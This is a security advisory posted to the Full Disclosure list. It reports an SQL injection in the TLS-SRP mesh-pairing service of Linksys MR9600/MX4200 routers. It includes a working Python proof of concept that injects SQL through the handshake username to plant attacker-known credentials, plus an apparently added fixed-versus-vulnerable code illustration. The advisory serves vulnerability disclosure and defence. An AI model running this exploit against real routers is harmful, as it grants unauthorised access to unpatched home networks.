Message-ID: <1747f4db-00f1-4fcf-9eb6-321c783a3ffb@syss.de>
Date: Thu, 12 Feb 2026 11:12:50 +0100
From: Christian Zäske via Fulldisclosure
 <fulldisclosure@...lists.org>
To: <fulldisclosure@...lists.org>
Subject: [FD] [SYSS-2025-009] Linksys MX9600/MX4200 - SQL Injection

Advisory ID:               SYSS-2025-009
Product:                   MR9600, MX4200 (and potentially others)
Manufacturer:              Linksys
Affected Version(s):       1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200 (and potentially others)
Tested Version(s):         1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
Vulnerability Type:        SQL Injection (CWE-89)
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2025-03-18
Solution Date:             -
Public Disclosure:         2026-02-12
CVE Reference:             Not yet assigned
Author of Advisory:        Christian Zäske, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Linksys MX4200 is a Wi-Fi mesh router targeting home users.

The manufacturer describes the product as follows (see [1]):

"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage
offers faster WiFi performance for lag-free online gaming and
simultaneous streaming to every device and corner of your home."

Due to improper neutralization of special elements, SQL statements can
be injected via the username sent during the handshake of a TLS-SRP
connection. This can be used to insert known credentials into the
database. These credentials can then be used to complete the handshake
successfully and use the protected service.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Linksys MX4200 (and other models) provides a service (sct_server
binary) running on TCP port 6060 (all interfaces except WAN), which is
used to integrate other mesh devices into the network. The service
accepts TLS-SRP connections with a username and password.

The service uses a separate script (smcdb_auth) to retrieve credential
information from an SQLite database, looked up by the given username.
Since the service does not properly neutralize special elements in the
username, arbitrary SQL statements can be injected. This can be used to
insert known credentials into the correct database table, which then
grant access to the protected service (sct_server).
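To make the root cause and its fix concrete, the following is an added illustration and not the smcdb_auth code (whose implementation is not public): the same lookup once built by pasting the SRP username into the SQL text and once with the username bound as a parameter behind an allowlist. The `authorize` column names and the allowlist are assumptions; the table contents are constructed.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the router's SQLite database. The column
# names are an assumption read off the INSERT/UPDATE in the PoC; the real
# smcdb_auth schema is not public.
SCHEMA = """
CREATE TABLE authorize (
    id TEXT, peer TEXT, username TEXT, label TEXT, salt TEXT, verifier TEXT
);
INSERT INTO authorize VALUES ('1', '1', 'node-a', 'node-a', '0A0B', 'C0FFEE');
"""

# Constructed SRP username with the same shape as the advisory's payload.
INJECTED_NAME = ("a'; INSERT INTO authorize VALUES "
                 "('999', '999', 'SySS', 'SySS', '00', '');--")

# Allowlist for node usernames (an assumption; adjust to what the product needs).
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, username):
    """Models the flaw: the username is pasted into the SQL text, which is run
    by an interface that executes every statement in it (as handing the string
    to the sqlite3 command-line tool would). A quote and ';' in the username
    therefore run attacker-chosen statements; rows are discarded here."""
    sql = f"SELECT salt, verifier FROM authorize WHERE username = '{username}';"
    conn.executescript(sql)  # stacked statements execute here


def lookup_safe(conn, username):
    """Hardened form: reject anything outside the allowlist, then bind the
    username as a parameter so it can never alter the statement."""
    if not USERNAME_RE.fullmatch(username):
        return None
    cur = conn.execute(
        "SELECT salt, verifier FROM authorize WHERE username = ?", (username,))
    return cur.fetchone()


def row_count(conn):
    return conn.execute("SELECT COUNT(*) FROM authorize").fetchone()[0]
```

Running `lookup_vulnerable(db, INJECTED_NAME)` on a fresh database leaves a second row (id 999) behind, while `lookup_safe` with the same input returns `None` and changes nothing.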

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the "tlslite-ng" library, the following Python code will inject
known credentials into the "authorize" table of the SQLite database in
use. These credentials can then be used to access the service.

   import socket
   from tlslite.api import VerifierDB, TLSConnection

   # SRP salt and verifier for the credentials to be planted ("SySS"/"SySS")
   N, g, salt, verifier = VerifierDB.makeVerifier("SySS", "SySS", 1024)
   verifier_bytes = verifier.to_bytes(128, "big")

   # First handshake: the username carries an INSERT that creates the row
   # (id 999) with the salt; the handshake itself is expected to fail.
   sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   sock.connect(("192.168.1.1", 6060))

   conn = TLSConnection(sock)
   try:
       conn.handshakeClientSRP(
           f"\"a\n'; INSERT INTO authorize VALUES "
           f"('999', '999', 'SySS', 'SySS', '{salt.hex().upper()}', '');--\"",
           "dummypass")
   except Exception:
       pass

   # One further handshake per verifier byte, appending it to the row's
   # verifier column (SQLite '||' string concatenation).
   for byte in verifier_bytes:
       sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       sock.connect(("192.168.1.1", 6060))
       conn = TLSConnection(sock)
       try:
           conn.handshakeClientSRP(
               f"\"a\n'; UPDATE authorize SET verifier = verifier || "
               f"'{byte.to_bytes(1, 'big').hex().upper()}' where id = 999;--\"",
               "dummypass")
       except Exception:
           pass


After the code is executed, the TLS-SRP handshake will successfully
complete when authenticating with the username "SySS" and the
password "SySS".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no known solution yet.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-01-30: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2026-02-12: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Linksys MX4200
    https://support.linksys.com/kb/article/952-en/
[2] SySS Security Advisory SYSS-2025-009
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-009.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Zäske of SySS
GmbH.

E-Mail: christian.zaeske@...s.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc
Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/